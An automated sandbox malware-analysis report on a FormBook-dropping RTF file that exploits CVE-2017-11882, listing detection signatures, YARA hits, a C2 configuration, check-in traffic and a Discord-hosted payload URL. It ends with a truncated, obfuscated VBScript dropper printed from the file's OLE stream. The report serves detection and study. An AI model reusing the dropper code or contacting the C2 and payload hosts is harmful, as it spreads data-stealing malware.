Windows Analysis Report SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.12171

Overview

General Information

Sample Name:	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.12171 (renamed file extension from 12171 to rtf)
Analysis ID:	532961
MD5:	bdacb3b17f31a06a8cfbedba2342bdf5
SHA1:	9f6930782942ec4bedc162be334b97f861d24f75
SHA256:	16fc1ecc295f8d7dba6647b9aeb8d538932910b24f3affe1853a82ab2c9d944a
Tags:	rtf
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Document contains OLE streams which likely are hidden ActiveX objects

Sigma detected: Office product drops script at suspicious location

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for dropped file

Found malware configuration

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Suspicious Script Execution From Temp Folder

Document contains OLE streams with names of living off the land binaries

Creates processes via WMI

Performs DNS queries to domains with low reputation

Found potential equation exploit (CVE-2017-11882)

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Sigma detected: WScript or CScript Dropper

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Sample uses process hollowing technique

Writes to foreign memory regions

Sigma detected: Microsoft Office Product Spawning Windows Shell

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Very long command line found

Microsoft Office drops suspicious files

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Found suspicious RTF objects

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Document contains Microsoft Equation 3.0 OLE entries

Enables debug privileges

Office Equation Editor has been started

Creates a window with clipboard capturing capabilities

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.getyourshoponline.com/t3t2/"], "decoy": ["professorphilipkaloki.com", "restorationlifeplus.com", "worldfreegamez.com", "paulasnaturalelements.com", "vecydoy.xyz", "certifiedhalina.com", "roundrockmail.com", "dyort.com", "ge3f.xyz", "skafina.store", "centsablefinancialplanning.com", "avatarig.com", "meta-x.store", "metataxbit.com", "contact-ebf.com", "soungy.com", "theoptiontwo.com", "pangeadba.com", "imovelemoradia.com", "almisanbs.net", "tracarau.info", "waterfallswisconsinplus.xyz", "d6f0tmpjmk9eutnnvfk4716.com", "kafani.xyz", "myponzu.com", "indigovideography.com", "poolcomplaints.com", "metaboxgame.xyz", "dtbd.net", "nocallwaiting.com", "imim-token.com", "annaitherasa.com", "caratnaked.com", "nnhu.space", "ballufa.bet", "theoudhy.com", "theroadbrand.store", "voguishshop.com", "wintangible.com", "cornheaderparts.com", "pulpbranding.com", "ambulante-reha-muenchen.com", "xd7bh22mc04.xyz", "keldefi.com", "maman-travail.com", "socialbizz.xyz", "shopauthentictampabayrays.com", "camylo.online", "zhangchanghong.com", "tafelimited.com", "eminkoy.com", "towne-kitchen.com", "marcasemele.com", "203.life", "innerrackers.com", "fddf.xyz", "sweettreatworld.com", "freeze-the-fat-away.com", "lillianpsmith.com", "fabulouspatricia.com", "sling-city.com", "wavesmodel.com", "africanancesry.com", "os-meta.com"]}

Yara detected FormBook

Source: Yara match	File source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 10.0.calc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.calc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.calc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.calc.exe.30000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 10.0.calc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.calc.exe.2f6578.1.unpack	Avira: Label: TR/ATRAPS.Gen

Exploits:

Found potential equation exploit (CVE-2017-11882)

Source:

Static RTF information: Object: 1 Offset: 0001CF23h

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe			Jump to behavior

Document contains Microsoft Equation 3.0 OLE entries

Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.dr

Stream path '_1699986732/\x1CompObj' : ...........................F....Microsoft Equation

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000A.00000003.476792049.0000000000590000.00000004.00000001.sdmp, calc.exe, 0000000A.00000003.473897930.0000000000430000.00000004.00000001.sdmp, calc.exe, 0000000A.00000002.513205717.0000000000B90000.00000040.00000001.sdmp, calc.exe, 0000000A.00000002.512398332.0000000000A10000.00000040.00000001.sdmp, rundll32.exe
Source:	Binary string: rundll32.pdb source: calc.exe, 0000000A.00000002.510696461.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000A.00000002.510980436.00000000002E4000.00000004.00000020.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 185.230.63.177:80

Source: C:\Windows\explorer.exe	Domain query: www.marcasemele.com
Source: C:\Windows\explorer.exe	Network Connect: 185.230.63.177 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.lillianpsmith.com
Source: C:\Windows\explorer.exe	Domain query: www.vecydoy.xyz
Source: C:\Windows\explorer.exe	Network Connect: 50.62.137.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.39.13 80	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9 HTTP/1.1Host: www.vecydoy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=3Qj9oZZfewD59ZVrWkdF2G2Wunuif2Jlkx5S2y1tDqrPnVj26TOdvUTbk2/4ZHnYpFjC/w==&aJ=btx8n42x9 HTTP/1.1Host: www.marcasemele.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=Y2xcL3ZkL7oVFMSzs9YHectEjMd2sfTUB3/xlHaDCcg2Dqhlo8BobNvGWm7cW+r/txQJ1w==&aJ=btx8n42x9 HTTP/1.1Host: www.lillianpsmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: WIX_COMIL WIX_COMIL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WINWORD.EXE, 00000000.00000002.568839221.00000000077BE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: WINWORD.EXE, 00000000.00000002.568839221.00000000077BE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: WINWORD.EXE, 00000000.00000002.566495233.0000000004320000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.478361676.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000004.00000002.412949970.0000000001C40000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.480030722.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000B.00000000.480398853.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.499613113.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540511030.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoosL
Source: explorer.exe, 0000000B.00000000.481335940.00000000045CF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000B.00000000.491997913.0000000008412000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484058899.0000000008412000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico78
Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WINWORD.EXE, 00000000.00000002.566495233.0000000004320000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.478361676.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000B.00000000.479348436.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000B.00000000.489922157.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000B.00000000.479986148.0000000003DF8000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.499778084.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540627935.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.489277123.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpo
Source: explorer.exe, 0000000B.00000000.501190404.000000000839F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.488949395.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540459698.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.499591438.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpZ
Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000B.00000000.499778084.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.484075172.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540627935.0000000004513000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.501268068.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.489277123.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000B.00000000.484075172.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.501268068.0000000008424000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000B.00000000.496932161.0000000003D90000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 0000000B.00000000.483961784.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.481527230.000000000460B000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.542438433.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.540867844.000000000460B000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 0000000B.00000000.483961784.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.542438433.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1)
Source: explorer.exe, 0000000B.00000000.481335940.00000000045CF000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: global traffic	HTTP traffic detected: GET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9 HTTP/1.1Host: www.vecydoy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=3Qj9oZZfewD59ZVrWkdF2G2Wunuif2Jlkx5S2y1tDqrPnVj26TOdvUTbk2/4ZHnYpFjC/w==&aJ=btx8n42x9 HTTP/1.1Host: www.marcasemele.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /t3t2/?s2MDa=Y2xcL3ZkL7oVFMSzs9YHectEjMd2sfTUB3/xlHaDCcg2Dqhlo8BobNvGWm7cW+r/txQJ1w==&aJ=btx8n42x9 HTTP/1.1Host: www.lillianpsmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.0.calc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, type: DROPPED	Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs

Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.dr	Stream path '_1699986730/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Path\Client.vbs.. ..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..F0xCRC341414141 = E0xCRC341414141( Join (TristateUseDefault0xCRC341414141,""))..End Function........Function G0xCRC341414141()..G0xCRC341414141 = "\toor\.\\!}etanosrepmi=leveL"..End Function........Function H0xCRC341414141()..H0xCRC341414141 = "noitanosrepmi{:stmgmniw"..End Function........Function I0xCRC341414141()..I0xCRC341414141 = E0xCRC341414141 ("putratSssecorP_23niW")..End Function........Function J0xCRC341414141()..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 